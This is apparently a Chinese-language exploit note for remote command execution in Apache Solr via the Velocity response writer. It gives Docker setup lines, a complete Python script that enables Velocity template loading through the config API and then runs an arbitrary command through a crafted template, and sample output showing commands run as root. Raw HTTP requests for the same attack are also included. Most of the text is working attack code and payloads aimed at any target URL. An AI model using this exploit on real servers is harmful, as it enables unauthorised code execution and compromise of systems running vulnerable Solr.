Apache Solr 命令执行

使用Docker

 docker pull solr
 docker run --name solr2 -d -p 8081:8983 solr

验证脚本

#!/usr/bin/env python
# coding: utf-8

import requests
import sys
import json
from requests.packages.urllib3.exceptions import InsecureRequestWarning
requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
proxies = {
  "http": "http://127.0.0.1:8080",
  "https": "http://127.0.0.1:8080",
}


if len(sys.argv) != 3:
    print "[+] Usage : ./solr_rce.py target command"
    exit()

target = sys.argv[1]
command = sys.argv[2]


getPathUrl = '/solr/admin/cores?indexInfo=false&wt=json'
try:
        Path = list(json.loads(requests.get(target+getPathUrl).content)['status'].keys())[0]
        headers = {'Content-Type': 'application/json', 'Content-Length':'259'}
        data = '''{
          "update-queryresponsewriter": {
            "startup": "lazy",
            "name": "velocity",
            "class": "solr.VelocityResponseWriter",
            "template.base.dir": "",
            "solr.resource.loader.enabled": "true",
            "params.resource.loader.enabled": "true"
          }
        }'''
        req = requests.post(target+'/solr/'+Path+'/config', headers=headers, data=data)
        
        if req.status_code == 404:
            print "[-] failed !"
            exit()
        elif req.status_code == 200:
            print "[+] Set Config Success!"
        # exec command
        payload = '/select?q=1&&wt=velocity&v.template=custom&v.template.custom=%23set($x=%27%27)+%23set($rt=$x.class.forName(%27java.lang.Runtime%27))+%23set($chr=$x.class.forName(%27java.lang.Character%27))+%23set($str=$x.class.forName(%27java.lang.String%27))+%23set($ex=$rt.getRuntime().exec(%27' + command + '%27))+$ex.waitFor()+%23set($out=$ex.getInputStream())+%23foreach($i+in+[1..$out.available()])$str.valueOf($chr.toChars($out.read()))%23end'
        req = requests.get(target+'/solr/'+Path + payload)
        print req.text
except:
    print('解析错误')

使用方法

[root@localhost ~]# python solr_rce2.py http://xx.xxx.xxx.xx whoami
[+] Set Config Success!
 0 root

[root@localhost ~]# 

参考：https://gist.githubusercontent.com/s00py/a1ba36a3689fa13759ff910e179fc133/raw/fae5e663ffac0e3996fd9dbb89438310719d347a/gistfile1.txt

Apache Solr RCE via Velocity template

Set "params.resource.loader.enabled" as true.

Request:
========================================================================
POST /solr/test/config HTTP/1.1
Host: solr:8983
Content-Type: application/json
Content-Length: 259

{
  "update-queryresponsewriter": {
    "startup": "lazy",
    "name": "velocity",
    "class": "solr.VelocityResponseWriter",
    "template.base.dir": "",
    "solr.resource.loader.enabled": "true",
    "params.resource.loader.enabled": "true"
  }
}
========================================================================


RCE via velocity template
Request:
========================================================================
GET /solr/test/select?q=1&&wt=velocity&v.template=custom&v.template.custom=%23set($x=%27%27)+%23set($rt=$x.class.forName(%27java.lang.Runtime%27))+%23set($chr=$x.class.forName(%27java.lang.Character%27))+%23set($str=$x.class.forName(%27java.lang.String%27))+%23set($ex=$rt.getRuntime().exec(%27id%27))+$ex.waitFor()+%23set($out=$ex.getInputStream())+%23foreach($i+in+[1..$out.available()])$str.valueOf($chr.toChars($out.read()))%23end HTTP/1.1
Host: localhost:8983
========================================================================


Response:
========================================================================
HTTP/1.1 200 OK
Content-Type: text/html;charset=utf-8
Content-Length: 56

     0  uid=8983(solr) gid=8983(solr) groups=8983(solr)
========================================================================